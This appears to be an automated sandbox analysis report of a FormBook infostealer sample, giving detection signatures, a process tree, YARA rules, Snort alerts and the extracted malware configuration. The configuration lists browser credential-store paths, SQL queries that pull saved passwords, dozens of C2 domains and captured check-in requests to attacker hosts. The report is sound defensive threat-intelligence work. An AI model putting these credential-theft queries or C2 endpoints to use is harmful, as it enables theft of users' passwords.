Loading ...

Play interactive tourEdit tour

Analysis Report RRW9901200241.exe

Overview

General Information

Sample Name:RRW9901200241.exe
Analysis ID:339369
MD5:61ffb4ad4721f51413075923b2e9468d
SHA1:aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
SHA256:546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RRW9901200241.exe (PID: 3016 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
    • RRW9901200241.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6556 cmdline: /c del 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "grayfoxden.com", "drupadhyayashomoeopathy.com", "coordinatedcare-ok.com", "the-legend-update3.com", "remoteworkoffer.com", "r3dprojects.com", "banhuaihangschool.com", "7852bigbucktrail.info", "villagepizzafloralpark.com", "sgtradingusa.com", "evolvestephanieperreault.com", "timelessbeautylessons.com", "monkeytrivia.com", "bsf.xyz", "canda.design", "recetasnutribullet.com", "olenfex.com", "catatan-matematika.com", "roeltecnologiadigital.com", "jutoxnatural.com", "euroticie.info", "tmxinc-chemicals.com", "futurehawick.com", "xaxzwz.com", "kitfal.com", "mickey2nd.com", "world10plus.com", "harkinstheates.com", "conceptpowder.com", "aeshahcosmetics.com", "netglog.net", "mystery-enigma.net", "packerssandmover.online", "weinsurehumans.com", "estrade-monschau.com", "poinintiteknologi.com", "zipdelta.com", "thibau4.xyz", "immobiliervaldoingt.com", "superherospirit.com", "c-vital33.com", "dydongyuan.com", "glamatomy.com", "campingpt.com", "wozhebank.com", "citestaccnt1597754710.com", "localcryptod.com", "celinemnique.com", "broderies-admc.com", "watdomenrendi03.net", "dehaochu.com", "missbeehavn.com", "ryangyoung.com", "kcspantry.com", "posdonanim.com", "directtestingservice.com", "toastxpress.com", "kingdommarketinguniversity.com", "quantumtoday.xyz", "modernhomespa.com", "peakeventsservices.com", "dellvn.net", "maryjoyllc.com", "trentog.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitvn.com/krc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.RRW9901200241.exe.1a00000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.RRW9901200241.exe.1a00000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RRW9901200241.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RRW9901200241.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: RRW9901200241.exeAvira: detected
          Antivirus detection for URL or domainShow sources
          Source: http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RRW9901200241.exeJoe Sandbox ML: detected
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.RRW9901200241.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: SUPERDATA-AS-VNSUPERDATA-VN SUPERDATA-AS-VNSUPERDATA-VN
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.7852bigbucktrail.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.toastxpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1Host: www.unitvn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.7852bigbucktrail.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Jan 2021 20:49:10 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 